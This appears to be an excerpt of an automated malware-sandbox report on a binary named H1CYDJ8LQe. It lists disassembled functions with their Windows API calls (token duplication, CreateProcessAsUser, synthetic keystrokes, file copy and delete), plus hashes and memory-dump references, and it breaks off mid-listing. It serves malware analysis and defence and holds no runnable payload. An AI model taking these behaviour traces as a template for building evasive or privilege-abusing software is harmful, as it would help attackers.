                                                            • Opcode ID: 68aa9c4c5b5d14d70cb59537a1bb621dd1898131db9d16ab95866e5cac0f1ede
                                                            • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                            • Opcode Fuzzy Hash: 68aa9c4c5b5d14d70cb59537a1bb621dd1898131db9d16ab95866e5cac0f1ede
                                                            • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                            Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                            • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                            • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                            • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                            Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                            • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                            • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                            • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                            Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __lock_file
                                                            • String ID:
                                                            • API String ID: 3031932315-0
                                                            • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                            • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                            • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                            • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                            Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                            • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                            • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                            • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                            Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                            • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                            • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                            • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                            Function 00410CFC Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                            Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                            • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                            • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                            • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                            Function 02E722A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 02E722B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 8d91ab66a8316bb2b6dce627c27eae9ff12b5c72864e6991b4ad18cdf0105ea2
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 09E0E67498010EDFDB00EFB4D54969E7FB4EF04301F104161FD05D2280D6309D508A72

                                                            Non-executed Functions

                                                            Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                            • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                            • GetKeyState.USER32(00000011), ref: 0047C92D
                                                            • GetKeyState.USER32(00000009), ref: 0047C936
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                            • GetKeyState.USER32(00000010), ref: 0047C953
                                                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                            • _wcsncpy.LIBCMT ref: 0047CA29
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                            • SendMessageW.USER32 ref: 0047CA7F
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                            • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                            • ImageList_SetDragCursorImage.COMCTL32(00991E18,00000000,00000000,00000000), ref: 0047CB9B
                                                            • ImageList_BeginDrag.COMCTL32(00991E18,00000000,000000F8,000000F0), ref: 0047CBAC
                                                            • SetCapture.USER32(?), ref: 0047CBB6
                                                            • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                            • ReleaseCapture.USER32 ref: 0047CC3A
                                                            • GetCursorPos.USER32(?), ref: 0047CC72
                                                            • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                            • SendMessageW.USER32 ref: 0047CD12
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                            • SendMessageW.USER32 ref: 0047CD80
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                            • GetCursorPos.USER32(?), ref: 0047CDC8
                                                            • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                            • GetParent.USER32(00000000), ref: 0047CDF7
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                            • SendMessageW.USER32 ref: 0047CE93
                                                            • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,02E81A90,00000000,?,?,?,?), ref: 0047CF1C
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                            • SendMessageW.USER32 ref: 0047CF6B
                                                            • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,02E81A90,00000000,?,?,?,?), ref: 0047CFE6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F
                                                            • API String ID: 3100379633-4164748364
                                                            • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                            • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                            • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                            • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                            Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00434420
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                            • IsIconic.USER32(?), ref: 0043444F
                                                            • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                            • SetForegroundWindow.USER32(?), ref: 0043446A
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                            • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                            • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                            • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                            • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                            • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                            • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                            • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                            • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 2889586943-2988720461
                                                            • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                            • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                            • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                            • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                            Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                            • CloseHandle.KERNEL32(?), ref: 004463A0
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                            • GetProcessWindowStation.USER32 ref: 004463D1
                                                            • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                            • _wcslen.LIBCMT ref: 00446498
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • _wcsncpy.LIBCMT ref: 004464C0
                                                            • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                            • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                            • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                            • CloseDesktop.USER32(?), ref: 0044657A
                                                            • SetProcessWindowStation.USER32(?), ref: 00446588
                                                            • CloseHandle.KERNEL32(?), ref: 00446592
                                                            • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                            • String ID: $@OH$default$winsta0
                                                            • API String ID: 3324942560-3791954436
                                                            • Opcode ID: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                            • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                            • Opcode Fuzzy Hash: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                            • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                            Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                              • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • _wcscat.LIBCMT ref: 0044BD94
                                                            • _wcscat.LIBCMT ref: 0044BDBD
                                                            • __wsplitpath.LIBCMT ref: 0044BDEA
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                            • _wcscpy.LIBCMT ref: 0044BE71
                                                            • _wcscat.LIBCMT ref: 0044BE83
                                                            • _wcscat.LIBCMT ref: 0044BE95
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                            • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                            • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                            • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                            • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 2188072990-1173974218
                                                            • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                            • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                            • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                            • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                            Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                            • FindClose.KERNEL32(00000000), ref: 00478924
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                            • __swprintf.LIBCMT ref: 004789D3
                                                            • __swprintf.LIBCMT ref: 00478A1D
                                                            • __swprintf.LIBCMT ref: 00478A4B
